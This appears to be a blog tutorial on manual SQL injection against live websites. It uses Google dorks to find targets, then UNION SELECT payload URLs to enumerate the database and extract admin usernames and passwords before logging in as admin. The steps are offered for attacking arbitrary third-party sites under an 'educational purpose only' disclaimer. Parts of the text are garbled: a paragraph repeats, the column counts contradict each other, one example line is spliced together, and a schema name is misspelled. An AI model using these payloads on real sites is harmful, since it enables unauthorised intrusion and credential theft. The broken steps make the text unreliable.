SQL Injection is insertion of malicious sql code into the application program. These codes are injected cleverly to exploit the website. SQL injection is top attack that websites face. It is ranked 1st in to top 10 hacking's that websites face. So How to SQL inject and what it can do?
SQL injection can be performed by using Havij. But doing it manually is always better and there is no comparison between a human mind and a software.
How to SQL Inject Manually?
Step 1: Find Google Dorks
Search for Google dorks(list of website that can be hacked). Download list of all dorks.
Search any of these keywords
Inurl:index.php?id=
Inurl:article.php?id=
Inurl:gallery.php?id=
Now open any of the website in result
Step 2: Check if website is vulnerable or not.
Simply add a single quote ( ‘ ) at the end of the website url. If it gives an error like-
“There is an error in your SQL syntax. Check the manual that corresponds to your MYSQL server”
 |
| Error in my case. |
Note: the error may not look exactly as above. The website is vulnerable if not then try on some other website.
Step 3: Find no of columns in Database.
Remove (‘) from the url and add "order by int_value" (I'm using int as some integer value).
Example
www.example.com/index.php?id=3 order by 1
www.example.com/index.php?id=3 order by 2
www.example.com/index.php?id=3 order by 3
www.example.com/index.php?id=3 order by 4
Do this process recursively till you get an error. In my case, error occured for 4th. So, the no of columns is 3. If it doesn't work try by
adding -- at the end.
Example
www.example.com/index.php?id=3 order by 1--
 |
| You will get an error like this |
Replace id=int with id=-int in url and add union select
1,2,3,…….till the last column. In our case no of columns are 11. Replace 3 with -3 and add union select
1,2,3,4,5,6,7,8,9,10.
If not working add "and 1=2" after id=-3Ex-
www.example.com/index.php?id=-3 union select 1,2,3,4,5,6,7,8,9,10
Example :
www.example.com/index.php?id=-3 and 1=2 union select 1,2,3,4,5,6,7,8,9,10
 |
| column 3 in my case |
Now you will get an error with the columns on the page that are vulnerable the page look may appear weird but the vulnerable column number will be printed somewhere. There may be more that 1 vulnerable column select any one of them. In our case it is 3.
Step 5: Find version, database and user
Simply replace the vulnerable column no with “version()”.
Ex - www.example.com/index.php?id=-3 union select 1,2,
version(),www.example.com/index.php?id=-3 and 1=2 union select 1,2,3,4,5,6,7,8,9,10
Press enter and note the version. Similarly replace column no with database()
and user() respectively.
Step 6: Find the table name of database
Replace the vulnerable column no with “group_concat(table_name)”
and add “from information_schema.tables where table_schema=database()--”
Ex: www.example.com/index.php?id=-3 union select 1, group_concat(table_name),3 from information_schema.tables where table_schema=database()--
It will display the list of table names now use your common
sense to select one that you think is admin table(generally the admin table
looks like admin, admin_tab, admin_info, etc). Here i choose the admintab
table.
Step 7: Find the column name
Change the table name to ASCII code for capital
letters.
In our case it is “admintab” so its ASCII code is Mysql char format is “CHAR(97, 100, 109, 105, 110, 116, 97, 98 )”. If you don’t know the ASCII code install the hackbar add-on for Mozilla Firefox(only).
In the toolbar go to sql->mysql->mysqlchar() in the addon. Type the table name here it is “admintab”.
Now, replace the vulnerable column no with “group_concat(column_name)” and add “from information_schema.column where table_schema=mysqlchar--”.
In our case it is “admintab” so its ASCII code is Mysql char format is “CHAR(97, 100, 109, 105, 110, 116, 97, 98 )”. If you don’t know the ASCII code install the hackbar add-on for Mozilla Firefox(only).
In the toolbar go to sql->mysql->mysqlchar() in the addon. Type the table name here it is “admintab”.
Now, replace the vulnerable column no with “group_concat(column_name)” and add “from information_schema.column where table_schema=mysqlchar--”.
Ex: www.example.com/index.php?id=-3 union select 1, group_concat(column_name),3 from information_schema.column where table_schema=CHAR(97, 100, 109, 105, 110, 116, 97, 98 )--
This query will display the list of of columns in table
admintab
Ex: (admin_name, admin_pass, admin_username, email, phone_no, address etc.)Again use your brain to select the columns that you think may contains vulnerable information or try all combinations. Replace the “group_concat(column_name” with “group_concat(column1, 0x3a,column2)”.
Ex: www.example.com/index.php?id=-3 union select 1, group_concat(admin_pass, 0x3a, admin_username)If you do all the steps correctly and the website is weak you can get information's like admin password and username.
Step 8: Find the admin page of the website.
Just Google admin example.com or you can use tools like
havij or any other third party apps for locating it. Enter the username and
password to login as admin.
This is How to SQL inject tutorial and intended for educational purpose only. Please Comment and share.
No comments:
Post a Comment